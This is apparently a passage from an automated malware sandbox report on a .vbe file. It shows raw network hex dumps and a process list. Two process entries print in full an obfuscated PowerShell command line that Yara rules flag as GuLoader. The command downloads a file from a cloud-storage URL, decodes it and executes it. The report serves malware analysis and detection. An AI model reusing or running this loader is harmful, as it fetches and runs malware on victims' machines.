                                                                                                    2024-10-24 06:46:54 UTC1378INData Raw: 5e ce 2c 36 2a 11 2c e6 8d f1 ad 92 09 45 b7 13 87 37 bc 33 58 a3 7a 7f 21 e5 10 12 2b 0e 11 01 b8 6d 65 e6 45 e7 25 49 d9 54 b4 0e 4b 87 e4 11 64 a9 0e f1 37 40 26 88 d8 5a 5b a1 cb f1 3a d2 91 f2 8b b5 86 c3 30 d7 42 5d 32 83 4e 50 fd e0 1a 01 55 88 b5 dd e8 22 a1 b3 e9 eb 08 ee f7 8b 9a 8c aa fe 15 29 11 57 57 de 51 7b dc 09 39 9e 48 8c 98 9b 63 d9 8c 22 75 78 1c 03 29 cc fa e2 09 9e 45 a0 f2 37 4f 62 37 32 5f d5 89 6d 9d 27 1f 1c 00 2b 48 aa 3e ed f9 b5 8b a4 98 e7 c0 3d b2 11 3c 7b 22 48 98 b7 10 5b 23 62 7e 9a f0 1a c9 d8 4b e0 27 13 c8 25 1b 0a 8e 9a 7b 05 d6 d3 7f 45 34 06 ee f0 10 e5 24 75 7a 2c 61 c9 50 cd 6b 73 62 cc b3 87 1b 6e c0 c0 90 52 bf a9 83 1f 6f 10 47 0f 3d de 58 19 ea b7 67 3e 80 95 d6 b1 41 8c cd d8 68 cf 11 d3 df 33 03 35 58 7d 64
                                                                                                    Data Ascii: ^,6*,E73Xz!+meE%ITKd7@&Z[:0B]2NPU")WWQ{9Hc"ux)E7Ob72_m'+H>=<{"H[#b~K'%{E4$uz,aPksbnRoG=Xg>Ah35X}d
                                                                                                    2024-10-24 06:46:54 UTC1378INData Raw: 89 ba 0d 02 45 fb 3d 2b 98 a4 7a 5c 53 7b ec dd cc d7 2b 23 d8 da ef cd 08 03 e4 f1 4b 8f a4 28 01 eb ff 06 02 32 6e c7 21 9e 76 64 db 34 a6 73 c7 63 f9 13 75 a6 e3 4e ab 93 ba 04 17 03 21 65 da b7 c2 db b8 4e 6a 30 25 63 fe b3 dd 43 6c 20 c3 5c 43 f6 eb 7c c2 1b 4d 01 49 b5 e8 17 7b 31 3e d9 06 37 39 3c 20 15 aa 29 66 41 a0 26 ba 7f ab 47 b8 06 ca 3d 63 22 ed c6 4e a3 3a 63 41 4d 1f 7d 0c 16 be 24 dd 79 41 d2 ec 1b c1 d9 91 b1 f7 0e 17 5b 6e b1 ef 50 8b fa f8 bb df db 59 2a 9a 03 a2 e7 19 dd a7 e6 4b 30 c3 93 06 6f 35 30 2a 4a f3 aa 70 59 aa c6 9f 16 c8 42 43 bb 00 12 d1 72 1d 37 28 e6 50 7b fe d1 8f 85 e8 2d 41 ba 44 c2 54 32 5a ee 2f 74 05 d9 f8 15 86 ec 86 a8 82 fe 39 00 ab 6e b8 d5 78 14 b9 5c d2 d9 75 34 51 59 c4 5c 1b 30 aa 84 03 d1 43 53 21 b2 5d
                                                                                                    Data Ascii: E=+z\S{+#K(2n!vd4scuN!eNj0%cCl \C|MI{1>79< )fA&G=c"N:cAM}$yA[nPY*K0o50*JpYBCr7(P{-ADT2Z/t9nx\u4QY\0CS!]
                                                                                                    2024-10-24 06:46:54 UTC1378INData Raw: 93 19 cf ee 6e 40 b1 f8 7d 19 53 92 b0 2e 86 7e bf ad 48 f2 79 3a 18 78 8a 13 c7 60 94 86 be 41 a1 16 bc fe 4c d7 a3 a4 7b 20 be 53 c4 31 e3 e4 f4 3d 58 e7 e3 5f 98 12 05 0d 26 de 93 7d 85 a2 ce ef 74 1a 41 a8 8f ed fb 3d d6 9c ed 05 58 86 04 cb 4b 53 4b b5 6d 05 4a 7c 0c f0 62 95 b8 cd 73 15 ef 45 2e b8 45 7c 6c 9e 86 79 85 df 98 f5 36 e1 fa 13 be ba ff 40 93 7c 73 9a 3c c4 00 cf bc fa de c2 e3 aa 22 ad 2d d0 bd d2 09 cc 88 1b 83 2d 8f 52 aa 39 21 f3 d0 db 58 d4 75 3b 6f f7 ea 4c b8 0e 6e 24 94 8a 07 56 e9 79 e7 66 fa 1e 8a 62 fc 55 ae 40 a8 a3 29 e6 12 44 bd 4c 7a 2d ac 73 2e 65 e4 ac 0d 37 40 86 7c e7 66 2c cf f9 b8 53 03 29 32 ca 06 d2 d3 8f d6 41 d7 b9 57 ee 49 27 94 29 96 3b 60 e1 2a 82 ee 1c ae 9c b3 5b c3 5e e3 f7 62 86 76 c9 9c b3 8d 1c 9e c6 fd
                                                                                                    Data Ascii: n@}S.~Hy:x`AL{ S1=X_&}tA=XKSKmJ|bsE.E|ly6@|s<"--R9!Xu;oLn$VyfbU@)DLz-s.e7@|f,S)2AWI');`*[^bv


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:02:45:56
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe"
                                                                                                    Imagebase:0x7ff72e450000
                                                                                                    File size:170'496 bytes
                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:02:45:58
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnb u.SkibsSPseudESindsC Ja au tuiRAlvorI omneTFrilay.acedp SkydREr trOFilarTHandeObrummCFrowzOtwigslBowleTO kalY Re uPBondeefarew]Tryks:kowto:Uve,sTH emsLNedtrS Omni1Uncu,2Opbyg ');$Halmknippernes=$Kalligrafi[0];$Bedstemanden=(Plumet ' Udtr$ AfgagofficlNonstO Kongb micra UndelSemil: M.rfSq.ateHLast iNedstTPelsvHCusc,eWo dee MonelBille=Dmmekn Ga eeCau oWAllev-SkannOrie.eBEgnsbj Antee QuilcOutsaTCrus SmadrSAcidiY Sou.S SkibtvanitE Tre MAaled.Fon,tN A.miE T edtquins.KaabeWStrave SperbPun,tCInaqul h nrITurisE tyvenT lvrTDemur ');Extralegal ($Bedstemanden);Extralegal (Plumet ',ocks$Misa.SSkudahRottei GnidtReparhFlin,eTa eleUnadvlU tto.TakleH Tille Milla XylodMenine Mar.r Rbens ackd[Ente $ eneFFljlse StilrD doei afskeBarrigsucceiOwasurSjllao nceseSalgsnC eers Bl,s]Aberr=Bryst$PlissRAsia,eAffolsM.dleeEscarrEntrev FitnaLagentDrenciMezzaoUnpernO erss WreasBistrl Lad iPodiapAg rap.odereN bonrU,kin ');$Bathroot=Plumet 'Psal $StivfSBre ih UomtiAarlet Funkhsprede TeeneMonstl.elig.BagatDTightoSter.wF emlnSamirlme ero La iaAffaldLicheFRetouiBoyunlsenlaeD cis(Normo$HumphH iljaa glolF imamNovenkIpom,nIridii oldsp Folkp SupeeFi,kerResumn ForteCubb,sProdu,In,sa$helv.T WorluNabk.nindrygKoppasCoe apGluttaWhoritBefamsFarmb)O fin ';$Tungspats=$Stenotypist;Extralegal (Plumet 'Digte$Ant dgSta kL TourOTabetbMonesA U arLPodz : PyrofRefo.oCle ur S opUKindhrSp ite BoraNLnmodifilstN storG ilpsT,afiS Motik UrocaL snid Pr se ChasrN,nvisEncha2a iog3Konsu=Pitsa(UndepTManneeS,rinsMyrioTSigva- IntepI,dusaKonfotIrnachR.mst hamm$ ,akutargkeUFora.nLeca gSuperS ConsP u.esA ExamtBibliSWefti)Lensg ');while (!$Forureningsskaders23) {Extralegal (Plumet 'Marm $ ygelgBefarlTyve o SandbQuan,aH izelO,ers:Bl ndSLaterpSclera,lvberProvoe SrlokT ianaDe tasBjeacsappreeResp b Dydse Gengs SnydtUndi y fremrRigs e BeknrParene kheps den=A veg$ChecktSjlekrGaffeuG aameCo pa ') ;Extralegal $Bathroot;Extralegal (Plumet 'LearnSSolinTbalsaaIntraRSigtvtM sku- BistSVentrlDrejeEPred eMyriaP.ikke olde4Kavit ');Extralegal (Plumet ' ,ors$FumeuGEjendlHalbeOTerribNonseA Aga LVi.rn:CursoftillioStellrDiazoUFlammRQuickERevoln RavnI rhven BeskGSvlgesEnebosUnr pKGenerAVandld FiskESalgsRMalknSHe to2torun3Unflo=Skysk(Frge TSimioeSuborSHy.oaTSm.gr- Knorp CortAElimaTTangeHT rsk Bed.m$HandltJac eUUntorn AvergNontispionePSuperA DemeT .upes,iner) uggy ') ;Extralegal (Plumet ' Acet$Excreg SubllMyxoboS orob liskAOscilLCarbu:PotenF sertoemeliR SvagsAlimeiK,udeN UndiKReciteStyleL.aaliSO erbeT.araRNonpenAmatrEboligsA phi=Komm $Parmeg.nfumLSo,keONonchbNeuria ZlotlArk v: Hab,CGangloMicroAPairpcBl dfHSlutswFiffihUn luIanisopBenga+Ostle+,urne%carto$Uni.ekBismaaSkumplSprawLPapiriHyph GSal eRPil eAAlu afNeur IJord .Amph,CScripoCult.u Dv rnDekomTTotem ') ;$Halmknippernes=$Kalligrafi[$Forsinkelsernes];}$Forskrerbrt=328123;$Desinficeringers=31343;Extralegal (Plumet 'Desig$Antong orlaLSprucOGirseBSal ta CrucLArome:afskrS Ang tRntgeVBorusNBowsiEHold,rGobsmSrecli Auto=Calqu SpillGOutsoeAntigtBr ss- CoriCVaageOfrdigN Blo,T FlleEDe alNUfredTSgeo, Cisiu$T,lveT .ndeuOve.aNSmigeGUdnytsOk,lePW ttma Kwmit mmolSbhmer ');Extralegal (Plumet 'Botfl$Para,gKphdil,cealoAftrab,estra,rvill,tent:Epip BS ikkiSemessFrsteo ituinHindeo SammkQuadrs Arb eCfhkrrUdbygn BereeSynkrs Frem2Cod.b4Busc 4P.rsi Hloft=Ud yk All.r[Om edSAmas,yAktivsAll ntPhre,e kontmUnder. M rcCNoc.noMoonsnG mmivB evbe NonhrUddantSjusk]phary:F rdr:su erFDrivvr BlinoNetvrmV.olaBPyjamaH.uses Ri.leSi ho6 Mer 4Sagk Sl part Gr irCrowniPuppenUltrag Unto(Dekad$armb,SMonactImplevPlebinComoreInvulrSkkeps.ller)Bredd ');Extralegal (Plumet 'Hjert$,ijouGhardhLDibliOEpicebLo pia,nwanlStof,:SlattgNoninRPartieSvirpwUtrichDampmOVoveuU ricknDandrD rot rese=.catt Inte [Hest SCockayUplifSCo onT yskeEFemkaMSkr v.ImpurtIc noESkiheXCoralTprosp. FloseBecouNVeraycUndisoAdresd ResmiTurboN SkilgU ska] Pneo:Willo:tarveaStatsS RubeCtranqIA atrIQuill. levaG,uzukeRehosTElvenSUdd bT OverRRakl I luskn ygieGSysop(Fr ct$origibTrafiI Dests .aceo MousnT ipaO ,flvkTarapsSrestERepaiRIldnenIndfrEUnsi.sPrede2 Udla4.erog4Lentn)Extem ');Extralegal (Plumet 'Fal e$,agdegGametlindtgoFilmebUdenraComprLEkspo:P stmAJamboNJ,rdasKevi,pThreanS.oleDSummaeComp,NMek.nDSej sE Spons lesh= Damm$ C.stGnaturRF.ansEbr deWLege.H,nsupOBindiUCorncNCunniD Wa t.NyvursJeannuDrageBArt sS BrobTAaregRD,voviPochoNM crog D,se(Oofyu$ Sk yFAbscioForsorSeletS DevekR,ahurGidsee D sir Sem,b HerrRSubj TPalmi,Nonde$ReseddChitie ogtas V rmi HenvNbef,rf Bru,I EkskC ImbreOver,rEnsilIUps,dnLysfoGF,ngoeFitterCapi s Srgm) Fuld ');Extralegal $Anspndendes;"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:02:45:58
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:02:46:15
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnb u.SkibsSPseudESindsC Ja au tuiRAlvorI omneTFrilay.acedp SkydREr trOFilarTHandeObrummCFrowzOtwigslBowleTO kalY Re uPBondeefarew]Tryks:kowto:Uve,sTH emsLNedtrS Omni1Uncu,2Opbyg ');$Halmknippernes=$Kalligrafi[0];$Bedstemanden=(Plumet ' Udtr$ AfgagofficlNonstO Kongb micra UndelSemil: M.rfSq.ateHLast iNedstTPelsvHCusc,eWo dee MonelBille=Dmmekn Ga eeCau oWAllev-SkannOrie.eBEgnsbj Antee QuilcOutsaTCrus SmadrSAcidiY Sou.S SkibtvanitE Tre MAaled.Fon,tN A.miE T edtquins.KaabeWStrave SperbPun,tCInaqul h nrITurisE tyvenT lvrTDemur ');Extralegal ($Bedstemanden);Extralegal (Plumet ',ocks$Misa.SSkudahRottei GnidtReparhFlin,eTa eleUnadvlU tto.TakleH Tille Milla XylodMenine Mar.r Rbens ackd[Ente $ eneFFljlse StilrD doei afskeBarrigsucceiOwasurSjllao nceseSalgsnC eers Bl,s]Aberr=Bryst$PlissRAsia,eAffolsM.dleeEscarrEntrev FitnaLagentDrenciMezzaoUnpernO erss WreasBistrl Lad iPodiapAg rap.odereN bonrU,kin ');$Bathroot=Plumet 'Psal $StivfSBre ih UomtiAarlet Funkhsprede TeeneMonstl.elig.BagatDTightoSter.wF emlnSamirlme ero La iaAffaldLicheFRetouiBoyunlsenlaeD cis(Normo$HumphH iljaa glolF imamNovenkIpom,nIridii oldsp Folkp SupeeFi,kerResumn ForteCubb,sProdu,In,sa$helv.T WorluNabk.nindrygKoppasCoe apGluttaWhoritBefamsFarmb)O fin ';$Tungspats=$Stenotypist;Extralegal (Plumet 'Digte$Ant dgSta kL TourOTabetbMonesA U arLPodz : PyrofRefo.oCle ur S opUKindhrSp ite BoraNLnmodifilstN storG ilpsT,afiS Motik UrocaL snid Pr se ChasrN,nvisEncha2a iog3Konsu=Pitsa(UndepTManneeS,rinsMyrioTSigva- IntepI,dusaKonfotIrnachR.mst hamm$ ,akutargkeUFora.nLeca gSuperS ConsP u.esA ExamtBibliSWefti)Lensg ');while (!$Forureningsskaders23) {Extralegal (Plumet 'Marm $ ygelgBefarlTyve o SandbQuan,aH izelO,ers:Bl ndSLaterpSclera,lvberProvoe SrlokT ianaDe tasBjeacsappreeResp b Dydse Gengs SnydtUndi y fremrRigs e BeknrParene kheps den=A veg$ChecktSjlekrGaffeuG aameCo pa ') ;Extralegal $Bathroot;Extralegal (Plumet 'LearnSSolinTbalsaaIntraRSigtvtM sku- BistSVentrlDrejeEPred eMyriaP.ikke olde4Kavit ');Extralegal (Plumet ' ,ors$FumeuGEjendlHalbeOTerribNonseA Aga LVi.rn:CursoftillioStellrDiazoUFlammRQuickERevoln RavnI rhven BeskGSvlgesEnebosUnr pKGenerAVandld FiskESalgsRMalknSHe to2torun3Unflo=Skysk(Frge TSimioeSuborSHy.oaTSm.gr- Knorp CortAElimaTTangeHT rsk Bed.m$HandltJac eUUntorn AvergNontispionePSuperA DemeT .upes,iner) uggy ') ;Extralegal (Plumet ' Acet$Excreg SubllMyxoboS orob liskAOscilLCarbu:PotenF sertoemeliR SvagsAlimeiK,udeN UndiKReciteStyleL.aaliSO erbeT.araRNonpenAmatrEboligsA phi=Komm $Parmeg.nfumLSo,keONonchbNeuria ZlotlArk v: Hab,CGangloMicroAPairpcBl dfHSlutswFiffihUn luIanisopBenga+Ostle+,urne%carto$Uni.ekBismaaSkumplSprawLPapiriHyph GSal eRPil eAAlu afNeur IJord .Amph,CScripoCult.u Dv rnDekomTTotem ') ;$Halmknippernes=$Kalligrafi[$Forsinkelsernes];}$Forskrerbrt=328123;$Desinficeringers=31343;Extralegal (Plumet 'Desig$Antong orlaLSprucOGirseBSal ta CrucLArome:afskrS Ang tRntgeVBorusNBowsiEHold,rGobsmSrecli Auto=Calqu SpillGOutsoeAntigtBr ss- CoriCVaageOfrdigN Blo,T FlleEDe alNUfredTSgeo, Cisiu$T,lveT .ndeuOve.aNSmigeGUdnytsOk,lePW ttma Kwmit mmolSbhmer ');Extralegal (Plumet 'Botfl$Para,gKphdil,cealoAftrab,estra,rvill,tent:Epip BS ikkiSemessFrsteo ituinHindeo SammkQuadrs Arb eCfhkrrUdbygn BereeSynkrs Frem2Cod.b4Busc 4P.rsi Hloft=Ud yk All.r[Om edSAmas,yAktivsAll ntPhre,e kontmUnder. M rcCNoc.noMoonsnG mmivB evbe NonhrUddantSjusk]phary:F rdr:su erFDrivvr BlinoNetvrmV.olaBPyjamaH.uses Ri.leSi ho6 Mer 4Sagk Sl part Gr irCrowniPuppenUltrag Unto(Dekad$armb,SMonactImplevPlebinComoreInvulrSkkeps.ller)Bredd ');Extralegal (Plumet 'Hjert$,ijouGhardhLDibliOEpicebLo pia,nwanlStof,:SlattgNoninRPartieSvirpwUtrichDampmOVoveuU ricknDandrD rot rese=.catt Inte [Hest SCockayUplifSCo onT yskeEFemkaMSkr v.ImpurtIc noESkiheXCoralTprosp. FloseBecouNVeraycUndisoAdresd ResmiTurboN SkilgU ska] Pneo:Willo:tarveaStatsS RubeCtranqIA atrIQuill. levaG,uzukeRehosTElvenSUdd bT OverRRakl I luskn ygieGSysop(Fr ct$origibTrafiI Dests .aceo MousnT ipaO ,flvkTarapsSrestERepaiRIldnenIndfrEUnsi.sPrede2 Udla4.erog4Lentn)Extem ');Extralegal (Plumet 'Fal e$,agdegGametlindtgoFilmebUdenraComprLEkspo:P stmAJamboNJ,rdasKevi,pThreanS.oleDSummaeComp,NMek.nDSej sE Spons lesh= Damm$ C.stGnaturRF.ansEbr deWLege.H,nsupOBindiUCorncNCunniD Wa t.NyvursJeannuDrageBArt sS BrobTAaregRD,voviPochoNM crog D,se(Oofyu$ Sk yFAbscioForsorSeletS DevekR,ahurGidsee D sir Sem,b HerrRSubj TPalmi,Nonde$ReseddChitie ogtas V rmi HenvNbef,rf Bru,I EkskC ImbreOver,rEnsilIUps,dnLysfoGF,ngoeFitterCapi s Srgm) Fuld ');Extralegal $Anspndendes;"
                                                                                                    Imagebase:0x6a0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2132644099.0000000008BA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2116981246.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2133348411.0000000009DD1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:02:46:15
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:02:46:34
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                    Imagebase:0xa60000
                                                                                                    File size:59'904 bytes
                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:02:47:35
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe"
                                                                                                    Imagebase:0x820000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:11
                                                                                                    Start time:02:47:37
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                    Wow64 process (32bit):true
